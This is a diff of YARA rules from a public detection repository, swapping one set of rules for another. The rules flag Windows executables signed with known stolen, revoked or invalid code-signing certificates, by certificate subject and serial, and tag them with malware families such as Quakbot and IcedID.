+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FORWARD MUSIC AGENCY SRL" and pe.signatures [ i ] . serial == "df:25:47:b2:ca:b5:68:9a:81:d6:1d:e8:0e:aa:a3:a2" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00E38259Cf24Cc702Ce441B683Ad578911 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_58Af00Ce542760Fc116B41Fa92E18589 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "79e00e92-4ddb-5f87-8f60-78f326674c66"
+		id = "62fd5f76-b890-5532-8c6f-e26942584899"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1585-L1596"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8266-L8279"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "53d135553b88484e2c40976a9eaa0eb3f4f34c40ce775c198dfd6552155d1859"
+		logic_hash = "bcabd77b40ad9eae4c499c8cd4b3e3d39e5478fa590be536860375e890c1b62e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "16304d4840d34a641f58fe7c94a7927e1ba4b3936638164525bedc5a406529f8"
+		thumbprint = "620dafea381ab657e0335321ca5a95077f33021927a32d5d62bff7e33704f4b7"
+		reason = "Quakbot"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Akhirah Technologies Inc." and pe.signatures [ i ] . serial == "00:e3:82:59:cf:24:cc:70:2c:e4:41:b6:83:ad:57:89:11" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DICKIE MUSDALE WINDFARM LIMITED" and pe.signatures [ i ] . serial == "58:af:00:ce:54:27:60:fc:11:6b:41:fa:92:e1:85:89" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_4929Ab561C812Af93Ddb9758B545F546 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_5B1F9Ec88D185631Ab032Dbfd5166C0D : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "e57e442a-6fe3-5d09-bbc4-d290a7a80090"
+		id = "233466e6-7b5f-50d7-967a-976b698e9194"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1598-L1609"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8281-L8294"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a03f37840b24456a4a2ef8e7c456dc99396886682156e4e95f7547bf38d8dc4d"
+		logic_hash = "05428b4e636a60fb409ead0f4aeb25ed08dae24d58c98a17bb77aa521706763a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "0946bf998f8a463a1c167637537f3eba35205b748efc444a2e7f935dc8dd6dc7"
+		thumbprint = "a46234c01e9f9904e500aefad4b5718d86aaec4e084b3d8ffbfe5724f8ddda45"
+		reason = "Quakbot"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Everything Wow s.r.o." and pe.signatures [ i ] . serial == "49:29:ab:56:1c:81:2a:f9:3d:db:97:58:b5:45:f5:46" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TOPFLIGHT GROUP LIMITED" and pe.signatures [ i ] . serial == "5b:1f:9e:c8:8d:18:56:31:ab:03:2d:bf:d5:16:6c:0d" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00B649A966410F62999C939384Af553919 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_Ff52Eb011Bb748Fee75153Cbe1E50Dd6 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "6b88b712-6d25-5152-80bf-562bf82f336c"
+		id = "452d9f84-a950-5503-adaf-fba95b45e798"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1611-L1622"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8296-L8309"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "231b0aa0a1e7c72552d683cc4f93b39444f7c1ebb3bb719bee224aa62e9a28dd"
+		logic_hash = "e439f15c3312ed3a1840967bb165300a491ffe3d1c9c629abcbebf3efd9b1f50"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "a0c6cd25e1990c0d03b6ec1ad5a140f2c8014a8c2f1f4f227ee2597df91a8b6c"
+		thumbprint = "c75025c80ab583a6ab87070e5b65c93cb59b48e0cbb5f99113e354a96f8fcd39"
+		reason = "Quakbot"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "F.A.T. SARL" and pe.signatures [ i ] . serial == "00:b6:49:a9:66:41:0f:62:99:9c:93:93:84:af:55:39:19" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TASK ANNA LIMITED" and pe.signatures [ i ] . serial == "ff:52:eb:01:1b:b7:48:fe:e7:51:53:cb:e1:e5:0d:d6" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_22367Dbefd0A325C3893Af52547B14Fa : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_Eda0F47B3B38E781Cdf6Ef6Be5D3F6Ee : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "301f126d-1ff6-5512-a38b-ca1dd7d67765"
+		id = "4d845dd7-4153-5082-bff0-d5f9a7b4b46e"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1624-L1635"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8311-L8324"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7b717a86ba0a6c3c8ba59c7b7c97dae802c351340ad67a9baf3f526b084e995a"
+		logic_hash = "7b53d30e5b6176eaae854bf4046339864225b417a147fe6f24fb51dfb0535911"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "b5cb5b256e47a30504392c37991e4efc4ce838fde4ad8df47456d30b417e6d5c"
+		thumbprint = "1ef38b7c430c09062f4408c47da14d814be5e2e99749e65a2cf097f5610024fc"
+		reason = "Matanbuchus"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "F.lux Software LLC" and pe.signatures [ i ] . serial == "22:36:7d:be:fd:0a:32:5c:38:93:af:52:54:7b:14:fa" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ADVANCED ACCESS SERVICES LTD" and pe.signatures [ i ] . serial == "ed:a0:f4:7b:3b:38:e7:81:cd:f6:ef:6b:e5:d3:f6:ee" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00E04A344B397F752A45B128A594A3D6B5 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_4728189Fa0F57793484Cdf764F5E283D : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "85a7c3f7-a449-54ad-aac4-53f2a2c6c30e"
+		id = "02ec531e-aa1b-50b8-ae32-d885a0185cfe"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1637-L1648"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8326-L8339"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "db3c854b68387aa5c6976783e6f79f99fe3389344b64d38c603d298128193e12"
+		logic_hash = "181971946ee4d643430b733ed57ccf07c940205853c9e5102b08b7bc509bcc63"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "d73229f3b7c2025a5a56e6e189be8a9120f1b3b0d8a78b7f62eff5c8d2293330"
+		thumbprint = "89ff94ac1c577eced3afc9a81689d30ca238a8472ad0f025f6bed57a98dbb273"
+		reason = "Quakbot"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Highweb Ireland Operations Limited" and pe.signatures [ i ] . serial == "00:e0:4a:34:4b:39:7f:75:2a:45:b1:28:a5:94:a3:d6:b5" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Power Save Systems s.r.o." and pe.signatures [ i ] . serial == "47:28:18:9f:a0:f5:77:93:48:4c:df:76:4f:5e:28:3d" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00A7989F8Be0C82D35A19E7B3Dd4Be30E5 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_24E4A2B3Db6Be1007B9Ddc91995Bc0C8 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "0bb81ddc-b63b-534b-852f-7b0a2feeef9e"
+		id = "47ca5986-3de8-56f2-a15d-ef588d8a9e03"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1650-L1661"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8341-L8354"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "66d600d97b5aca1aa9a302671f06aef0d5c4ae9829d6cb16f191bd4c59462d2e"
+		logic_hash = "71d1f8e9113170f410007b31c0d7316c537001b2a761f1e35d6bd2aa0b39f2d9"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "3e93aadb509b542c065801f04cffb34956f84ee8c322d65c7ae8e23d27fe5fbf"
+		thumbprint = "005af6c8e9f06a2258c2df70785a5622c8d10d982fdc7f4dbe2f53af6e860359"
+		reason = "Quakbot"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Instamix Limited" and pe.signatures [ i ] . serial == "00:a7:98:9f:8b:e0:c8:2d:35:a1:9e:7b:3d:d4:be:30:e5" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FLY BETTER s.r.o." and pe.signatures [ i ] . serial == "24:e4:a2:b3:db:6b:e1:00:7b:9d:dc:91:99:5b:c0:c8" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_39F56251Df2088223Cc03494084E6081 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_0772B4D1D63233D2B8771997Bc8Da5C4 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "4b5c27e0-0b3e-52e6-a867-1c2adadf3af3"
+		id = "a05a2bc4-a4a3-5e86-9a1c-ed82de7786df"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1663-L1674"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8356-L8369"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "dc757f831b2537f12151f4f9e886ccf83bacfbcaea3ce12b2199f13ae00b199e"
+		logic_hash = "056fefbc03cff00a40ea9bb65893b92fcc15134c7cf7bf7dedf98f43b44bc03d"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "66f32cf78b8f685a2c6f5bf361c9b0f9a9678de11a8e7931e2205d0ef65af05c"
+		thumbprint = "c6a78692f2fda8908933fb3f1df68592eb5da129caafd33329d1b804006973f7"
+		reason = "IcedID"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Inter Med Pty. Ltd." and pe.signatures [ i ] . serial == "39:f5:62:51:df:20:88:22:3c:c0:34:94:08:4e:60:81" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Maya logistika d.o.o." and pe.signatures [ i ] . serial == "07:72:b4:d1:d6:32:33:d2:b8:77:19:97:bc:8d:a5:c4" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_009Cfbb4C69008821Aaacecde97Ee149Ab : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_1Deea179F5757Fe529043577762419Df : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "0b0d815b-2232-5159-9b78-9227d9b2ec11"
+		id = "a6b9b9e4-0998-5f67-8c12-7628ba3a5a56"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1676-L1687"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8371-L8384"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "de04f12b1fb1e12860bf4ac077b700d180b8d412890922b75264319559fbd997"
+		logic_hash = "b521363d1d38a4ed1b2b4126aec85ed6bffc23dc4e30f6f6c942e1fa96b0dd8d"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "6c7e917a2cc2b2228d6d4a0556bda6b2db9f06691749d2715af9a6a283ec987b"
+		thumbprint = "9c4e87ccd6004a70115f8e654b8cc1a80d488876ff2e4e7db598303fa41b3fef"
+		reason = "Quakbot"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Kivaliz Prest s.r.l." and pe.signatures [ i ] . serial == "00:9c:fb:b4:c6:90:08:82:1a:aa:ce:cd:e9:7e:e1:49:ab" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SPIRIT CONSULTING s. r. o." and pe.signatures [ i ] . serial == "1d:ee:a1:79:f5:75:7f:e5:29:04:35:77:76:24:19:df" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_008Cff807Edaf368A60E4106906D8Df319 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_061A27A3A3771Bb440Fc16Cadf2675C4 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "ad8bed7f-3bc6-53d3-9e7a-0868e2ad267a"
+		id = "ef600135-6f5d-59a9-b387-60e8eb97cbf9"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1689-L1700"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8386-L8399"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "48752aff88cd3d546757a4220a64ca17cc9a5f00a42d2bc0571dedf5de769bc2"
+		logic_hash = "d85b9d2b6fe4ce99670a8f51e84d63f1ec6d0341a3715eeed3e3d6a0fda93dc5"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "c97d809c73f376cdf8062329b357b16c9da9d14261895cd52400f845a2d6bdb1"
+		thumbprint = "9ed703ba7033af5f88a5f5ef0155adc41715d3175eec836822a09a93d56e4b7f"
+		reason = "Matanbuchus"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "KRAFT BOKS OOO" and pe.signatures [ i ] . serial == "00:8c:ff:80:7e:da:f3:68:a6:0e:41:06:90:6d:8d:f3:19" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Westeast Tech Consulting, Corp." and pe.signatures [ i ] . serial == "06:1a:27:a3:a3:77:1b:b4:40:fc:16:ca:df:26:75:c4" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_2924785Fd7990B2D510675176Dae2Bed : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_06675181E7B5E1030B3D40926E2A47D3 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "2aedb37c-8991-5750-b0c6-b9d6e7bb5e79"
+		id = "2452580b-bbe8-5d54-888e-6f8fffb055cf"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1702-L1713"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8401-L8414"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "dbdd714575d3c5f9554026fea97c6e91073d30cf728396111a5106303bb7b624"
+		logic_hash = "14d963fd03187afb7afabc208e36d8bb45ec818b27782a6c3037229f82bf22d6"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "adbc44fda783b5fa817f66147d911fb81a0e2032a1c1527d1b3adbe55f9d682d"
+		thumbprint = "b617253b3695fd498d645bd8278d1bdae2bc36bd4da713c6938e3fe6b0cdb9a4"
+		reason = "NetWire"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Neoopt LLC" and pe.signatures [ i ] . serial == "29:24:78:5f:d7:99:0b:2d:51:06:75:17:6d:ae:2b:ed" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ORANGE VIEW LIMITED" and pe.signatures [ i ] . serial == "06:67:51:81:e7:b5:e1:03:0b:3d:40:92:6e:2a:47:d3" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_F2C4B99487Ed33396D77029B477494Bc : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_Dbc03Ca7E6Ae6Db6 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "594a5def-2516-5639-a72b-9b84b65de1e0"
+		id = "801bc9fc-0bd6-5c46-8c45-8cb06cfc4309"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1715-L1726"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8416-L8429"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "109d71674b652a2f42bb2a45c877d3a6cbfe280d0324f9ac8fa746d322440694"
+		logic_hash = "7d188663b00870e98984b4be4c72b0fd183b5fb8dd61512c1d65d386f1ebad0a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "f38abffd259919d68969b8b2d265afac503a53dd"
+		thumbprint = "e059776cb5e640569a06c2548e87af5bd655f5d4815b8f6e9482835455930987"
+		reason = "CobaltStrike"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bedaabaefadfdfedcbbbebaaef" and pe.signatures [ i ] . serial == "f2:c4:b9:94:87:ed:33:39:6d:77:02:9b:47:74:94:bc" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SPIDER DEVELOPMENTS PTY LTD" and pe.signatures [ i ] . serial == "db:c0:3c:a7:e6:ae:6d:b6" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_C54Cccff8Acceb9654B6F585E2442Ef7 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_26F855A25890B749578F13E4B9459768 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "c199b65f-5e95-5c6a-8ccc-7f343b867885"
+		id = "2953afc3-6a46-5126-8f82-52f8dc1f89d6"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1728-L1739"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8431-L8444"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4be5e0f9f522f0d4096a63b001a02ea130ef56149dec7f0ac90be686b885cc4a"
+		logic_hash = "2de5a2d4d692c14660a9ec3ed18a7d2d6741a862c86812fcd640b1378281c328"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "416c79fccc5f42260cd227fd831b001aca14bf0d"
+		thumbprint = "7c81ba35732d1998def02461217cfd723150151bc93375a3e27c2cec33915660"
+		reason = "Quakbot"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Eadbebdebcc" and pe.signatures [ i ] . serial == "c5:4c:cc:ff:8a:cc:eb:96:54:b6:f5:85:e2:44:2e:f7" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Boo’s Q & Sweets Corporation" and pe.signatures [ i ] . serial == "26:f8:55:a2:58:90:b7:49:57:8f:13:e4:b9:45:97:68" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_690910Dc89D7857C3500Fb74Bed2B08D : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_25Ba18A267D6D8E08Ebc6E2457D58D1E : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "d10931e2-8abb-592b-a070-3767f286bd74"
+		id = "d2c4907e-cec2-5386-96d3-8c122c7557fa"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1741-L1752"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8446-L8459"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "62a1be8435f73f3768030feb6b5917d9a8075e7abac52e654231ba9d16ccc374"
+		logic_hash = "38bdfa2291c7c3f81b29d41c65814002db3e4de11928699d2d946e87d313558d"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "dfeb986812ba9f2af6d4ff94c5d1128fa50787951c07b4088f099a5701f1a1a4"
+		thumbprint = "e59824f73703461c2c170681872a28a9bc4731d4b49079aa3afba1d29f83d736"
+		reason = "BadNews"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OLIMP STROI" and pe.signatures [ i ] . serial == "69:09:10:dc:89:d7:85:7c:35:00:fb:74:be:d2:b0:8d" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "5Y TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "25:ba:18:a2:67:d6:d8:e0:8e:bc:6e:24:57:d5:8d:1e" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_0Af9B523180F34A24Fcfd11B74E7D6Cd : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_0A2787Fbb4627C91611573E323584113 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "d9ef3746-8b8e-5259-bcc4-408e27bc8ce3"
+		id = "5da7ac8f-34f7-5949-9987-32e983a77ebe"
 		date = "2024-10-04"
 		modified = "2024-10-04"
-		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1754-L1765"
+		reference = "https://bazaar.abuse.ch/faq/#cscb"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8461-L8474"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e06c87bddfc4fbb8918b7b1d64ec66b810a5a0c635c34d820b33c3cf9789229c"
+		logic_hash = "e4ea9149f28798b48482ff68c3e08593a4510e3bd01e49ebdca7d450f15537e4"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "c8aec622951068734d754dc2efd7032f9ac572e26081ac38b8ceb333ccc165c9"
+		thumbprint = "8badf05b1814d40fb7055283a69a0bc328943100fe12b629f1c14b9448163aac"
+		reason = "Malware"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ORBIS LTD" and pe.signatures [ i ] . serial == "0a:f9:b5:23:18:0f:34:a2:4f:cf:d1:1b:74:e7:d6:cd" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "exxon.com" and pe.signatures [ i ] . serial == "0a:27:87:fb:b4:62:7c:91:61:15:73:e3:23:58:41:13" )
 }
 
